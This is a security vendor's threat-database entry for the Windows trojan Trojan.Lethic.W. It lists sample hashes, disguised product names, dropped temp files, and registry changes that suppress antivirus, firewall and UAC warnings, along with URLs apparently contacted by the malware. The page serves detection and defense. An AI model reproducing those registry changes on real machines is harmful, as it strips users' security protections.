Multi-License Discount Quote

Change Region

English
Threat Database Trojans Trojan.Lethic.W

Trojan.Lethic.W

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 1,888
Threat Level: 80 % (High)
Infected Computers: 1,259
First Seen: August 26, 2021
Last Seen: April 13, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.Lethic.W
Signature status: No Signature

Known Samples

MD5: b601aa457d8cb1d15ebbc394998a7933
SHA1: f4ae1c95d8e433c9f231de206df5af8a38144ff6
File Size: 243.93 KB, 243926 bytes
MD5: 4fb8d38094b2cf9c1f47279e91f4fa91
SHA1: 882d77e6403e26041c7f9f2eed621472d00cad86
File Size: 100.72 KB, 100724 bytes
MD5: 181a47cd5f4bf5a5fac1ab3d9585aaca
SHA1: 3c2a4fec2a89f41ce863c34ca2390146dddf272c
SHA256: C54FA1B8B94C68390812B1D96D08C9EF9CDDA27B08DCC707580F132D90E1EB2E
File Size: 1.16 MB, 1161276 bytes
MD5: 5332226a6e69927048362ab72c17193e
SHA1: bc663d5d91c997339e92dc51bdce681e0f7c12c0
SHA256: F274BEB2B84C2309B425B97FDFC083F21117359B93E0BF0EB81B876B8DF4BD99
File Size: 82.06 KB, 82056 bytes
MD5: e9704b11e6a1138cc12e8205ff3dde5f
SHA1: ace8cea3d032d411e91b42411060cd0e8d524685
SHA256: 942F06FB44AFC77251656115A4EA5F362A7CD6AC8AA03FE178A94BB0C56CE7B4
File Size: 100.23 KB, 100228 bytes
Show More
MD5: f294a63efc7f17c880bf544eabf1960a
SHA1: 9c814e9ef41c7003ba1cc8228b2c237d768c1cc0
SHA256: 7E6B3F36FE0DD29B974E9A4D275BFC6B8D8D680348129E29BB60863BF00D70CD
File Size: 2.35 MB, 2345648 bytes
MD5: fb8c555e0e69c5d101e7570a833eabaf
SHA1: 4c044f48593924aa32aa31d40383bfa16d29e4fe
SHA256: D0FD21393517E835CCA8229D00561584096058408DA3433ABA6B7D6230BAD831
File Size: 99.44 KB, 99438 bytes
MD5: 8c79d20f586548c5a00b20656f5d5e7d
SHA1: 60e3302b9ee8e6166d590cf76a942c80ecd60ded
SHA256: 20FC843D989C88F0FEED11E092E064863276DA75772735B49150017C8D419624
File Size: 235.23 KB, 235227 bytes
MD5: 550960141002cb558c95b89f64e477c7
SHA1: b81605b414b3792d3c0302247d4063cc3acb766d
SHA256: 4B1CD5E5CC4F8C8F319738FDBF0217E9D0510DE4AC2A2E6883E6D35E230517AE
File Size: 98.47 KB, 98465 bytes
MD5: a7bd19f26c816408d3ed0f038bd025ce
SHA1: 6b5061dfaebc63e9503c93015d79d54dad15c7c6
SHA256: 189F5B0F93DD6133A490F17D8767F43ED38C38C88F03A852B1326E3FC7101124
File Size: 90.37 KB, 90366 bytes
MD5: dd0462fcc626ba5668c04cc605864d6c
SHA1: 33c2ca6c52a47b6a9810f8791282df89af16ddba
SHA256: 2606783704E757BEBD9DF264A81039FF6FC888414A5AC0BEBC776AFA27F7ECF1
File Size: 98.53 KB, 98532 bytes
MD5: 6853d078f053f08a0dd68e7a51cbf511
SHA1: 4184b80d3a6987c06769d661599d11f38bf7c7ac
SHA256: AD180C540848330BBCC89D6934CF4060C1CD7747F7A057B445C1DA3A1A7BD465
File Size: 99.91 KB, 99914 bytes
MD5: ea341c97c915ed6183db72eef3adef2c
SHA1: 15bcbc11c27404af06d50878d6e58d9c8cf961cb
SHA256: 5BF1F6417CCAB637EA49D2278F427D6A29A3E0F63EA267CD24FA62A69BE8524D
File Size: 149.74 KB, 149743 bytes
MD5: fec9f3ca42592911a191618aebb9dbeb
SHA1: bec0f9b5bba3d7aae33cbdc721f30e3bb9104808
SHA256: 05E40F4946B1F8DE93D9AAB6B7C60DCFCA5949FB303268DAFC9F6D348613A1B9
File Size: 88.07 KB, 88072 bytes
MD5: 76a6ebbe64f7059b3cb5ebb6972a5014
SHA1: 9b6817f989e45e41198b7db350b95a78c82b8b3d
SHA256: AC625D2F6637B7E1DBF2AB8AF658FE8DC0915705CF5DA176BDB4A8B3358CD32B
File Size: 2.35 MB, 2345592 bytes
MD5: 1a6ba2ac09f5ca91179b71f7e3e5b387
SHA1: 7ff5abdcb53bcbda6bf698e5180a72fbe2b9d16d
SHA256: DA94D494108E8C1015B39C3CA7F3E0E02716FAD9F213BD0898CF57D81AC82BFD
File Size: 82.11 KB, 82107 bytes
MD5: d2111d2c5cded8afce76584b899f6adc
SHA1: cdb90194015c182b6345c9a069291ba7e9a7a714
SHA256: CC0161162E09D60B06A69E247D0FEE7A6987607794D437F90D942F6C0C08D292
File Size: 82.12 KB, 82121 bytes
MD5: d9ae4b459aae0055e0e03d8565078f1a
SHA1: 606b699b98ef09214acf46535fb66dad4d56a78e
SHA256: 7090B89668AA742D76192E9623844B69875397428E4FF67994E1E54292583D98
File Size: 106.69 KB, 106689 bytes
MD5: 94420378e8bcbcbdebfaf1e76083e17c
SHA1: c1c6a7a53caea9073804d151576495e2a6fd299f
SHA256: 5EE866012B7C46FD436C4C6512CAB384B064DBA175D16ABCA652525242E5869E
File Size: 307.82 KB, 307822 bytes
MD5: 59ba5a158af60c0bb59c5ad626382f89
SHA1: 8c3378d1c82acfcb16e1b7f073b1034b376046a6
SHA256: EE3A39B45C2778E9B89E27F94DF325C0145A2BB92B8F909AD26B9A1F50B22A49
File Size: 82.01 KB, 82010 bytes
MD5: d050d3fcfb7634be359a53105c8ee73b
SHA1: 191e45ad5a06e15b4b152c63f94717ab67e06119
SHA256: 506373CA6E34AB42B12B15F66E0D51F666FA5F465221C821366BC521E851526E
File Size: 79.16 KB, 79155 bytes
MD5: 9804892ff08a4ae858f9b0605ba8a535
SHA1: f8a5f64d6a75c8a4ca7c1aa9e041359c667a897d
SHA256: 171E6D27698AAC8C91C949BF196D68685329E85A5AA15002733BA2038DB1C8A1
File Size: 69.83 KB, 69827 bytes
MD5: c77d2f6b7a1f320fcddb60aa8f56bb38
SHA1: 7cb9d4453e38c3f5b07d275141c929cc03bec22e
SHA256: A941D3DB05A7A5BC8D0A653771B116A2014E8487A0CDE17B55DC6CB58C47C13F
File Size: 160.16 KB, 160159 bytes
MD5: 4f744a236dcbf1fc368762083e3ae38b
SHA1: a977ed26297cf005b020c63c221f12c6aa44c393
SHA256: 5AD46109DF436A862022A9AE5C79EE3A19881C5C1D2759C6ADA55D76B6263A50
File Size: 157.14 KB, 157140 bytes
MD5: e32840fb40176c121372963d64f69a15
SHA1: e5898e84ebedc103528c65065afbf5b057f411f2
SHA256: 53637FA8A7E6DFD3F5437EE6B00C1196783B79E58A23BA214E02F16EFA9499A0
File Size: 92.85 KB, 92847 bytes
MD5: 8ad87fbfda680f224fdd29d10734503d
SHA1: c945f154f4288d85c6e139efbe0362ddb4fe7391
SHA256: 362D68BFC32C4837634CA6025F747C0B3C6866362E655514740EA1282EE7C6D6
File Size: 254.59 KB, 254595 bytes
MD5: 633c97d89e7ea0fdc486c7746208d88b
SHA1: ea7ee6eac538fbba240155d02f86e929d31fdb40
SHA256: 6C9A26D09A3FE618DB069C332C921DC79B68E5CFC6848E57F31ED50F91D1E760
File Size: 2.35 MB, 2345650 bytes
MD5: 50979993ce702f9b71a9fa50a312ab86
SHA1: d0324ead881b16dd128ae6c6926ac0da6abee30c
SHA256: F48EE76D8E98A92AA57CA019741B79124F2AD7E32CC0AA061AD6BD074DC7CB4D
File Size: 160.00 KB, 160000 bytes
MD5: 4fe4475392eb1213b2fe3e5c8d0f2878
SHA1: ecce5b824b26a1208e90b5b96e6d4096b62e8d99
SHA256: E0C3BA88EB8CB23F1F4518BCABA052CB39646302BE84CF4153ABCF13F034BAFA
File Size: 561.69 KB, 561686 bytes
MD5: c01a7a8f56686334f2d61cde95e8274b
SHA1: 8f2cb94c713a36d4a5c2bfdd6524c73e2fb014a0
SHA256: FBAD0E6822ACE3DFD69E9170BADE704F4BBEB731F20648BF4015E7DDA47EDF42
File Size: 385.32 KB, 385324 bytes
MD5: 75e60a21f531f8c7103ef9ae09637aba
SHA1: afe8a8ee541d1f89b66216b741d792548af1d0d2
SHA256: 4F5957297FF725DF10FE715A2E49DC6CAB78C46719F351CDD1587A2B1F5E0A14
File Size: 271.08 KB, 271077 bytes
MD5: ba8e376d5c6433752157a1b94296af86
SHA1: 53883cb432ba723a7314a50c66a6e7e2bb2932ea
SHA256: 908DF48FE55F85C60EAB6B607EBE704056F0B3B6E9117F1C58154587322D9CBD
File Size: 86.40 KB, 86397 bytes
MD5: bbef5ed40040bad101330cce619fc4a1
SHA1: a5d06c7226513ad7cf5df03652bcf6757ce41d54
SHA256: DF0EE8AB2DBE45831541AB4ADE0AFCACE9D7F316219672D02C07C2F300380095
File Size: 73.73 KB, 73728 bytes
MD5: f77d97a50e1dbaa6b6b890df33d1c0d8
SHA1: bf014a9093bbf43074528100a8938864b24dffbc
SHA256: 459D8F5AB98B89C149F50193C3B9378DE1DCA22E16786E215B7837D6A71CF312
File Size: 172.27 KB, 172270 bytes
MD5: 5452777767c634053ac325b51c420912
SHA1: ec0f280432c9c4f7de22e836e07a16d6f1b1c8aa
SHA256: 73829A900406CE833BC126827CBCA0AAC668FE473424B9C357CCBF3DABBD8657
File Size: 244.44 KB, 244441 bytes
MD5: a1c6d19a3d22d2d6c01b45dd0afd313d
SHA1: 8b0477bc9964ff1c22971d90639e051ad921f528
SHA256: 77283654292DC61982CD14CA25E13F9B0C0A83078180AD9147B0ACBEEB9CDFEB
File Size: 115.48 KB, 115481 bytes
MD5: 9d12ae7ee4ecb1292ca45c6f13b39044
SHA1: 8d327aadf0574e913e7231e296c8f46bc8129b31
SHA256: D20FDFEECFB7101357D77E98B2A861E3EC1CABDC55CF6BD543D3805BC08B5FDB
File Size: 2.35 MB, 2345467 bytes
MD5: 254fd90aef7b13b4ab4edd063ed72b83
SHA1: 5ca1e884f22970850358cdb6dc4d2725fe64d59c
SHA256: 4CB58CDC516F5757D1B39BA518FB862C1E07EF58C8C54344F734C6FCD1C15B9B
File Size: 82.08 KB, 82075 bytes
MD5: dbee6d9fd5850588aeeaebad151554da
SHA1: 1ca78bfe0df0d60bfd50a054afe6406a1de9a1fe
SHA256: 322545C781420409ADF7730E9BC3751B62560174F1048503975805B2FBB9E575
File Size: 98.78 KB, 98776 bytes
MD5: 44efaf64918c76a2848bf0851dc883d1
SHA1: b5c42098495f55af2c55a20d542408b0cb0f6e60
SHA256: 61655657DFF78CD9CE8C34C13DDBDB5834548F26395A6FA5CC20D2EB86908948
File Size: 2.35 MB, 2345563 bytes
MD5: d76f8d589f97c9e983026827afa33a58
SHA1: b3aa69f144ab4a8cc8e59000531d366bd0820901
SHA256: F4D03E97770F3392AA194616AC1A0D5BE4E5EF501FD71E4ED8989E29FADFA3C4
File Size: 136.76 KB, 136756 bytes
MD5: a4683fb195204290cb78e75ce31da0e4
SHA1: adafdde0969bfc852e9291d6cbeeb0306822e6f7
SHA256: A504B5BAF435FE31B28BBEA59843FDA68D1180E5AFD632FC864064BF8BC2BE09
File Size: 79.08 KB, 79077 bytes
MD5: a6ba9e128cbb3e0d8c132cbf6fa08e5b
SHA1: 6d4d035fbe61bae15cd72fd999b6cf1212c89d9c
SHA256: CE7384CD532541B0EC8E008FD7BF8925D1E46246128DD34FBBC0390D30595168
File Size: 78.11 KB, 78108 bytes
MD5: c4d871c6a28dd97436c47e708076ae49
SHA1: 96245117da4aca10708c13c36298eb6438b05903
SHA256: 563B6289D6B849C5DE2F9417AE5331A4832461E8C84AD127566A6A7D6239BD6C
File Size: 120.39 KB, 120394 bytes
MD5: a08f8d0f188aa9837e6060848ff031d1
SHA1: 9f4e489de043e52b10119dab81006d2baab806db
SHA256: 708A2915D6BFD1FF55F7CBC19FBC2ABD4E89238B4EC77DD8484DF23C1494F045
File Size: 86.96 KB, 86958 bytes
MD5: 9227e625ceb79e34025d35d08b297329
SHA1: 03b1f103ce1dc48fbb72612f17d5d50dc3f3d117
SHA256: A5C7391C298F7681A5FFDA96177990120707EEFECCAF08071FE48D001208AFBB
File Size: 99.31 KB, 99312 bytes
MD5: 365d6ece00737b1bbe7727b40a8110a8
SHA1: c042e040d2d8171db489691938477d21832cecf1
SHA256: 468B8AE0A878882162CD69A85E610C51F66DF701199C9AB7B64A693039F7F89F
File Size: 2.35 MB, 2345530 bytes
MD5: 40bdfd38440fdc5b2935dce819699504
SHA1: 75fb7898db9dc138f247171e2ec6d6023e213b70
SHA256: 073D83A2F09A758E9419E8430803F98FD8EE991082DFB1689BB71DC6C79D68D8
File Size: 688.13 KB, 688128 bytes
MD5: 0bccb6d2e211b172db4ee342309e5bf1
SHA1: 7dc795913da9fdd03cbf78ba63c1172dfb6eb201
SHA256: E2F0542BFBA1805723DB0A0D4E3759FA7AB0153E946D74C1AC44FAE70F55F8E1
File Size: 98.47 KB, 98472 bytes
MD5: 3f11ee18bc4d8eed0d7fa61133de8c69
SHA1: 2fa13d1a07c67f22db96b1940b4f4ccc3fe0effb
SHA256: 701958195CED3E02D87D1E558FA9ED614CFE49212D30045EAD91DDC74393F2C8
File Size: 103.12 KB, 103119 bytes
MD5: 4bc7e12aa65ba98cd6cc5e6873276ee0
SHA1: d1341c1c8d9d208abb4cb586fd86f8d73d63b6c7
SHA256: 044FF9FFDF81C2CFE8DED9D561B9D97732885A88B518F257B40000EB5E1DBE7B
File Size: 82.83 KB, 82833 bytes
MD5: df0db2b32343409979227a7cda214857
SHA1: 9c5ac311d727a217108f4857dca11d16f6002d80
SHA256: 14E969511472561A90264A0F54B5E9143A2C9797413276D25C9D3E6C8B48CE01
File Size: 135.44 KB, 135445 bytes
MD5: b7960b650c59b2cc946078091d6d2a24
SHA1: 88ea921b87ca7304ee95cd021bbd8944b57a3969
SHA256: D3220CD52A8E327CA8B5ABB43BB281A272C772BC03714E185746A88CE563EAA0
File Size: 1.69 MB, 1690446 bytes
MD5: c9844ee5a29222a4005eca5dff8d0f6f
SHA1: 2ef82de41740bfeb275388c1624ded03a0735f47
SHA256: 9C5D02BF1F09BA8FB471F8DE9106A8805AC35D0BF89E5D8C52E0149D17086818
File Size: 696.32 KB, 696320 bytes
MD5: 30582c32514d264b255509cdac8d1a70
SHA1: d90b4b67b614af05a4417778ac1389ce1ef2f0e2
SHA256: F6ABBB3ADCE76549EA5A5BAB55EFDA18BBBCE722D27577ABC6CDC492933EC515
File Size: 82.26 KB, 82263 bytes
MD5: 721e9201ae69feef8478d4688c20a7ad
SHA1: dae2854c03123329e57e92dd9d33820f4dd05a33
SHA256: D045BC01A5EADE29E8F94464C6B5582C39105933E9D5F79F4CCF0E2B79E87601
File Size: 80.60 KB, 80599 bytes
MD5: cab090d922f37f05d4cdccc1afd33bdf
SHA1: c769bfbfcc5183ad53a2af8efbb93fb1435e164b
SHA256: 4783BC89CA5FD3EE56F5858ADADA4239DE817C1C2797BEE6FFB90BD193C591BE
File Size: 79.11 KB, 79110 bytes
MD5: e163fd7400736a8c5b916a111b12fcfd
SHA1: 910ad6275a280bfdb10f20312dd7a976b9d5bc98
SHA256: CEE415651514BA8CAF5D010C8D1A644C9E72AEB68AC7F47195CD3D5FB8A0ECE2
File Size: 70.28 KB, 70279 bytes
MD5: 0c16dc55952c9ee267c35207dc823fb7
SHA1: f0ce41bab527d7e04ff0c7520b653456ee09e868
SHA256: D953FD94161A5DAA8857585EB363F84FCE64411C9CD25C20B610BB920FDEC26B
File Size: 163.84 KB, 163840 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File has exports table
  • File is 32-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
Show More
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Show More

Windows PE Version Information

Name Value
Company Name
  • @EDINH08
  • BareFox Media
  • Georges KiEMTORE
  • Grillo Telematico di Grillo Luigi
  • Hackers Online Club
  • IsoVision Inc.
  • JENZABAR
  • LG_Google_Tool
  • Meme Corp
  • nowa era
Show More
  • RedSeek
  • sam plews
  • Scarymistake
  • SS
  • Strogino CS Portal
  • www.facebook.com/droidth
  • Your Company
File Description
  • Ativador RedSeek
  • Chay lan dau khi thay doi folder
  • Folder Lock
  • generates static entries from log-errors
  • HBG Refresh Jenzabar Domain Secret
  • Imprmante PDF pour le logiciel IsoVision
  • Left 4 Dead 2 Patcher
  • LG_Google_Tool
  • One-Click PC Optimizer
  • Optimize your PC
Show More
  • Product Description
  • Programma di Avvio Posware
  • Simple program to set taskbar on top
  • Uninstall and Cleaner
  • URUCHOM_2014_10_22
  • Windows Terminal
File Version
  • 15.4.0.0
  • 3.0.0.0
  • 2.0.1.4
  • 1.5.0.0
  • 1.00
  • 1.0.0.5
  • 1.0.0.2
  • 1.0.0.1
  • 1.0.0.0
  • 0.1.2.0
Show More
  • 0.0.1.2
  • 0.0.0.4
Internal Name TJprojMain
Legal Copyright
  • (c) 2025 TheAvacad0
  • 2016
  • BareFox Media
  • Copyright by Mario
  • Copyright HOC 2014
  • Copyright Info
  • Copyright IsoVision Inc.
  • Copyright Scary
  • dURka[iT2]
  • Eric Calonico
Show More
  • georgy.bf@gmail.com
  • LG_Google_Tool
  • nowa era
  • Se lo copi ti cadono le mani
  • ~
  • ® 2025 RedSeek
Original Filename TJprojMain.exe
Product Name
  • Age of Empires HD
  • AnyReset 1.5
  • Ativador RedSeek
  • AVVIO POSWARE
  • chase_base_data.exe
  • DiagBox Uninstall and Cleaner
  • gra
  • HBG Refresh Jenzabar Domain Secret
  • HOC Folder Lock
  • Imprimante PDF IsoVision
Show More
  • Left 4 Dead 2 Patcher
  • LG_Google_Tool
  • log static null
  • PC Cleaner
  • Project1
  • ProPC Optimizer
  • ProPC Optimizer v1.2
  • ProTerm
  • ServerDSP
  • SRK Tool Huawei
  • Taskbar Position
  • URUCHOM
Product Version
  • 15.4.0.0
  • 3.0.0.0
  • 2.0.1.4
  • 1.5.0.0
  • 1.00
  • 1.0.0.5
  • 1.0.0.2
  • 1.0.0.1
  • 1.0.0.0
  • 0.1.2.0
Show More
  • 0.0.1.2
  • 0.0.0.4

Digital Signatures

Signer Root Status
ProPC_Optimizer_v1.2 ProPC_Optimizer_v1.2 Self Signed

File Traits

  • 2+ executable sections
  • big overlay
  • HighEntropy
  • Installer Manifest
  • Installer Version
  • No Version Info
  • SusSec
  • x86

Block Information

Total Blocks: 196
Potentially Malicious Blocks: 6
Whitelisted Blocks: 190
Unknown Blocks: 0

Visual Map

x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x x 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Wana Decrypt0r.A

Files Modified

File Attributes
\device\namedpipe Generic Read,Write Attributes
\device\namedpipe Generic Write,Read Attributes
\device\namedpipe\dav rpc service Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
\device\namedpipe\pshost.134062115240340148.4444.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134128936157862211.2004.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_bpq4ciup.oqk.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_l4wshtmy.4g0.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_pbnmpfdz.zlz.ps1 Generic Write,Read Attributes
Show More
c:\users\user\appdata\local\temp\__psscriptpolicytest_srknn43t.4xs.psm1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\i6.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\i6.f Generic Write,Read Attributes
c:\users\user\appdata\local\temp\i6.t Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is64.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is64.fil Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is64.txt Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsgcaa.tmp\installoptions.dll Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsgcaa.tmp\iospecial.ini Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\nsgcaa.tmp\iospecial.ini Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nsgcaa.tmp\modern-wizard.bmp Generic Write,Read Attributes
c:\users\user\appdata\local\temp\rarsfx0 Synchronize,Write Attributes
c:\users\user\appdata\local\temp\rarsfx0\__tmp_rar_sfx_access_check_2927453 Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\rarsfx0\crack.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\rarsfx0\crack.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\rarsfx0\kill.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\rarsfx0\kill.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\rarsfx0\reg.reg Generic Write,Read Attributes
c:\users\user\appdata\local\temp\rarsfx0\reg.reg Synchronize,Write Attributes
c:\users\user\appdata\local\temp\wtmpd Write Attributes
c:\users\user\appdata\local\temp\wtmpd\tmp17635.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\wtmpd\tmp17635.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\wxy Write Attributes
c:\users\user\appdata\local\temp\xtmp Write Attributes
c:\users\user\appdata\local\temp\ytmp Write Attributes
c:\users\user\appdata\local\temp\ytmp\tmp13145.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp13145.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp16475.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp16475.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp26865.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp26865.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp2978.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp2978.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp36895ers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp36895ers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp39065ers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp39065ers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp4006sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp4006sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp43115.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp43115.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp6076sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp6076sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp65095.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp65095.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp68535.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp68535.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp7722sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp7722sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp783users\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp783users\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp87315.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp87315.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp9622sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp9622sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp98875.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ytmp\tmp98875.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp Write Attributes
c:\users\user\appdata\local\temp\ztmp\tmp3230sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp3230sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp3697.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp3697.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp4494sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp4494sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp4517sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp4517sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp5694sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp5694sers\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp804users\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp804users\user\downloads\.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp9947sers\user\downloads\.bat Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ztmp\tmp9947sers\user\downloads\.exe Generic Write,Read Attributes
c:\windows\system.ini Generic Read,Write Data,Write Attributes,Write extended,Append data

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 꼹㇡ǜ RegNtPreCreateKey
HKCU\local settings\muicache\1b\52c64b7e::@c:\windows\system32\ndfapi.dll,-40001 Windows Network Diagnostics RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\advanced::hidden  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center::antivirusoverride  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center::antivirusdisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center::firewalldisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center::firewalloverride  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center::updatesdisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center::uacdisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center\svc::antivirusoverride  RegNtPreCreateKey
Show More
HKLM\software\wow6432node\microsoft\security center\svc::antivirusdisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center\svc::firewalldisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center\svc::firewalloverride  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center\svc::updatesdisablenotify  RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\security center\svc::uacdisablenotify  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings::globaluseroffline RegNtPreCreateKey
HKLM\software\microsoft\windows\currentversion\policies\system::enablelua RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile::enablefirewall RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile::donotallowexceptions RegNtPreCreateKey
HKLM\system\controlset001\services\sharedaccess\parameters\firewallpolicy\standardprofile::disablenotifications  RegNtPreCreateKey
HKCU\software\apcr\1214104697::1919251317 RegNtPreCreateKey
HKCU\software\apcr\1214104697::-456464662 RegNtPreCreateKey
HKCU\software\apcr\1214104697::1462786655 RegNtPreCreateKey
HKCU\software\apcr\1214104697::-912929324 # RegNtPreCreateKey
HKCU\software\apcr\1214104697::1006321993 Č RegNtPreCreateKey
HKCU\software\apcr\1214104697::-1369393986 http://ecosukces.nazwa.pl/images/button.gifhttp://nurstravel. RegNtPreCreateKey
HKCU\software\apcr\1214104697::549857331 RegNtPreCreateKey
HKCU\software\apcr::u1_0 윣렴 RegNtPreCreateKey
HKCU\software\apcr::u2_0 RegNtPreCreateKey
HKCU\software\apcr::u3_0 権ă RegNtPreCreateKey
HKCU\software\apcr::u4_0 RegNtPreCreateKey
